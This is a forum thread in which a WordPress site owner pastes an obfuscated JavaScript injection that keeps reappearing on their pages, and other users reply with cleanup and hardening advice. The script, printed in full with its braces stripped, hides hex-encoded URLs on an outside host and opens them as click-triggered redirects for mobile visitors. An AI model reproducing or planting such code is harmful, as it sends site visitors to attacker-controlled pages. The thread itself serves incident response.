Anyone else getting this script at the bottom of each page of their site? I will remove it using the code editor, save, it'll be gone for a few days, then it'll return.
I have done a complete reinstall of all theme and plugins. Hardened the site, using WordFence plus many other countermeasures. Still happening. Anyone have any ideas? Thanks!
HERE'S THE SCRIPT:
<script>function _0x3023(_0x562006,_0x1334d6)const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880)_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;,_0x3023(_0x562006,_0x1334d6);function _0x1922()const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x78\x45\x6f\x33\x63\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x55\x4f\x46\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x59\x6a\x70\x38\x63\x388','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x53\x4d\x6f\x39\x63\x369','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x56\x58\x6c\x34\x63\x304','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x75\x67\x68\x37\x63\x337','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x54\x52\x5a\x32\x63\x352','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x6d\x6c\x4c\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function()return _0x5a990b;;return _0x1922();(function(_0x16ffe6,_0x1e5463)const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![])tryconst _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());catch(_0x3e3a47)_0x307c06['push'](_0x307c06['shift']());(_0x1922,0x984cd),function(_0x34eab3)const _0x111835=_0x3023;window['mobileCheck']=function()window[_0x123821(0x1c0)]),_0x399500;;const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x76\x75\x78\x30\x63\x310','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x72\x76\x6d\x65\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x42\x79\x43\x31\x63\x371',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0););,_0x564ab0=_0x3743e2=>const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];,_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);,_0x6ba060=(_0x1e9127,_0x28385f)=>const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);,_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');;_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0)const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)tryconst _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));catch(_0x161a43)_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);());</script>
Unless the site is cleaned properly, and the malware entry point identified, it will keep happening. Google “how to clean malware from an infected wordpress site” – there are tons of guides on how to do this. Cleaning involves deleting everything (except your DB & /wp-content/uploads) and starting from a **fresh** install. Reinstalling won’t remove malware.
(no need to post the script – all that matters is that your site is compromised and it needs to be cleaned)
I would probably start by downloading a backup of the site, including database, and search within the whole folder using vscode or something for a unique string of that script to see if there’s any compromises plugin or anything that is adding it.
I would also make sure I’m secure at the hosting level, change FTP passwords, make sure every account has 2FA etc. If you’re on managed hosting I would definitely involve your hosting’s customer support.
For monitoring and troubleshooting the Stream plugin will capture an audit log of which pages have been edited by which user, so that would indicate if a user account is being compromised. The WP Crontrol plugin will give you a list of cron events currently set up which could possibly be the method being used for this, it’s worth checking.
It’s most likely in your database.
No tool is going to help you.
You need an experienced developer.
You need to scan and scrub the entire server. If you have other sites on the same server(non isolated), those all need to be cleaned at the same time or you will keep playing whack a mole.
Try with GOTMLS. Also, this guide helped me a lot:
[New Malware Found in WordPress Installations: Hidden Admin Users, Redirects, and Plugin Hiding (Not Detected by 14 Major Scanners) : r/Wordpress (reddit.com)](https://www.reddit.com/r/Wordpress/comments/1feypel/new_malware_found_in_wordpress_installations/)
Security Plugins and Scanners can only do so much. At the end of the day, I would recommend a real expert to look at your site, because it could be more than 1 place.
Install something like Sucuri that will show you login attempts. See if it is a compromised password.